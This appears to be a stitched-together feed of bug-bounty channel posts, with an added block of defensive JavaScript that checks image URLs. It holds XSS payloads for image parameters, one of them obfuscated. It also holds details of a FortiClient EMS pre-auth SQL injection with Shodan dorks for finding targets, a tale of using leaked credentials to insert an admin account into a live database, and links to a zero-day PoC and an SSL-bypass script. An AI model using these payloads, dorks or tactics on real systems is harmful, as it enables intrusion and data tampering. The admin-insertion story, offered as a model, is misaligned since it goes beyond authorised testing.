Hey Hunters,
DarkShadow is here back again!
"If SSRF does not work in the image URL parameter, then try XSS"
In the image parameter you can use these types of payloads:
<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>
<svg onload=eval(window.name)>
"><svg onload=prompt(document.domain);>.png
嘼svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
Now guys, show your love🔥
#bugbountytips #xss
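A defender-side view of the tip above, as an added example that is not part of the original post: the image URL parameter is parsed, restricted to https and raster extensions, and HTML-escaped on output, so a payload carrying a `.png` suffix cannot break out of the `src` attribute. The host `img.example`, the placeholder path and all function names are assumptions.

```javascript
// Added example: server-side handling of a user-supplied image URL parameter.
// Host img.example and all function names are assumptions for illustration.
const ALLOWED_SCHEMES = new Set(["https:"]);
// Raster formats only: SVG is excluded because an SVG document can carry script.
const ALLOWED_EXT = /\.(png|jpe?g|gif|webp)$/i;

// Escape for use inside a double- or single-quoted HTML attribute.
function escapeAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Returns the serialized URL, or null when the value must be rejected.
function normalizeImageUrl(raw) {
  if (typeof raw !== "string" || raw.length > 2048) return null;
  let u;
  try {
    u = new URL(raw); // no base URL: bare markup such as "<svg ...>" fails to parse
  } catch (err) {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(u.protocol)) return null; // blocks javascript:, data:, http:
  if (u.username || u.password) return null;
  if (!ALLOWED_EXT.test(u.pathname)) return null;
  // u.href is the parser's serialization: ", <, > and spaces come back percent-encoded.
  return u.href;
}

// A suffix check alone passes "...>.png"; safety comes from normalizing and escaping.
function renderImg(raw) {
  const href = normalizeImageUrl(raw);
  if (href === null) return '<img src="/static/placeholder.png" alt="">';
  return `<img src="${escapeAttr(href)}" alt="">`;
}

// Constructed inputs (not captured traffic).
const samples = [
  "https://img.example/avatars/42.png?v=3&s=64",
  'https://img.example/x"><svg onload=prompt(document.domain);>.png',
  '"><svg onload=prompt(document.domain);>.png',
  "javascript:alert(1)//x.png",
];
for (const s of samples) console.log(renderImg(s));
```

The second sample passes the extension check, which is why the rendered value is the parser's serialization and not the raw string.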
🚨 Bug Bounty / Red Team Tip
CVE-2026-21643 — Critical Pre-Auth SQL Injection (CVSS 9.1) in FortiClient EMS 7.4.4 (multi-tenant mode only)
Unauthenticated attackers can inject arbitrary SQL via the Site HTTP header to the public endpoint
/api/v1/init_consts (or login endpoint). This happens before authentication and hits the PostgreSQL backend with superuser-level access in many setups → full DB dump, schema extraction, or RCE (via PostgreSQL features like COPY FROM PROGRAM).
- Affected: Only FortiClient EMS 7.4.4 (multi-tenant/Sites feature enabled)
- Not affected: 7.2.x, 8.0.x, single-site deployments
- Fixed: Upgrade to 7.4.5 or later
- Status: Actively exploited in the wild + public PoCs available
Main Detail Article (Highly Recommended):
Bishop Fox deep-dive with exploitation paths, payloads (e.g.,
pg_sleep(5) for blind testing), and lab results → https://bishopfox.com/blog/cve-2026-21643-pre-authentication-sql-injection-in-forticlient-ems-7-4-4
Public PoC (GitHub):
https://github.com/0xBlackash/CVE-2026-21643
Useful Google/Shodan Dorks:
- http.title:"FortiClient EMS" "7.4.4"
- http.html:"FortiClient Enterprise Management Server"
- http.favicon.hash: -specific-hash (or search for EMS login page)
- Shodan: "Model: FCTEMS" or "FortiClient EMS"
Quick Check:
If your EMS login page is internet-facing and running 7.4.4 with multi-tenant enabled → patch ASAP or block public access. Thousands of instances are exposed (Shadowserver ~2k+, Shodan ~1k+).
High-value target for hunters. Patch or restrict immediately!
#BugBounty #RedTeam #Fortinet #CVE202621643 #SQLi
Hey Hunters,
DarkShadow here back again!
out-of-scope target can lead to an in-scope critical vulnerability!
The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further what’s going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.
But here’s the twist—it was still showing the content from the original website I had requested. So I thought, maybe it’s working like a proxy?
Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside it—a config.php file.
Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessible—not just localhost!
I tried connecting… and boom! I was successfully connected.
But wait—this domain is out of scope, right?
That’s what I thought too… until I started reading their massive database and was shocked—
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.
At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly that—added an admin user to the database.
Now, on the target website, there’s a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?
BOOM! 💥
It logged me into the admin dashboard.
And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.✅
So guys, if you enjoyed this method, don’t forget to show some love—and please, pray for me, I’m really sick right now.
And don’t forget to follow me on X (Twitter): x.com/Darkshadow2bd
#bugbountytips #infosec
🔥 XSSnow — Advanced XSS Payload Generator & Testing Platform
⚔️ Dynamic XSS Payload Generation for Web Security Testing
📌 GitHub Repository
👉 https://github.com/dr34mhacks/xssnow
📌 Live Payload Platform
👉 https://xssnow.in/payloads.html
🚀 Snapchat SSL Bypass (2026) is now available — arm64-v8a only
I’ve just released my custom Frida SSL bypass script for the Snapchat Android application, fully updated to support the latest 2026 versions.
✅ Supported architecture: arm64-v8a only
Built and tested by me from scratch to support mobile security research, traffic inspection, and dynamic application analysis.
🔗 Frida CodeShare: https://codeshare.frida.re/@mr-blackhole/snapchat-ssl-bypass-all-new-version-of-2026/
Credit @shaho_it
🚨Payment Bypass Bug Lab - Master Payment Exploits Easily.
Lab 01: Price Modification
Lab 02: Direct Path Access
Lab 03: Permission Bypass
✅https://github.com/ItsRishika/Payment-bypass-bug-lab
🕸️𝗢𝗦𝗘𝗗 𝗡𝗼𝘁𝗲𝘀:
(𝗢𝗳𝗳𝗲𝗻𝘀𝗶𝘃𝗲 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗘𝘅𝗽𝗹𝗼𝗶𝘁 𝗗𝗲𝘃𝗲𝗹𝗼𝗽𝗲𝗿)
📋List:
•x86 Intel Assembly
•Portable Executable File Format
•WinDBG
•WinDbg Automation with Python
•IDA
•Stack Overflows
•SEH Overflows
•EggHunters
•Reverse Engineering For Bugs
•DEP Bypass
•ASLR Bypass
•Format Strings Vulnerabilities
•Practicing
Link 🔗:-
https://zeyadazima.com/notes/osednotes/
🔖#infosec #cybersecurity #hacking #pentesting #security
🔥 BlueHammer — Windows Defender 0-Day Privilege Escalation PoC
⚔️ Unpatched Windows Zero-Day Exploit (SYSTEM Access)
📌 GitHub Repository
👉 https://github.com/Nightmare-Eclipse/BlueHammer
Brut Security
10 Free Coupons - https://topmate.io/saumadip/2009859?coupon_code=awxe
New Contents will be added every month without any extra cost
🔴 LIVE CLASS ALERT — Don't scroll past this.
💻 Brut Security is launching a Practical Web Pentesting Live Class — and seats are limited.
🗓️ Starts: May 4
🎯 Mode: Online (Live)
──────────────────
🛠️ What you'll learn:
• SQL Injection, XSS, IDOR, SSRF
• Authentication & Access Control Bypass
• CSRF, File Upload Attacks
• Burp Suite from scratch
• Recon, API Hacking & Reporting
──────────────────
This isn't a pre-recorded course. This is LIVE — ask questions, break things in real time, and learn the way actual pentesters do.
✅ Beginner friendly
✅ Hands-on labs
✅ Certificate on completion
🔗 Enroll now → http://wa.link/brutsecurity
⚡ Spots fill fast. Don't wait.
#BrutSecurity #WebPentesting #EthicalHacking #BugBounty #Cybersecurity #LiveClass
🚨 CVE-2026-23898 & CVE-2026-23899: Critical File Deletion and Webservice Flaws Exposed in Joomla.
👇Dorks
HUNTER : product.name="Joomla"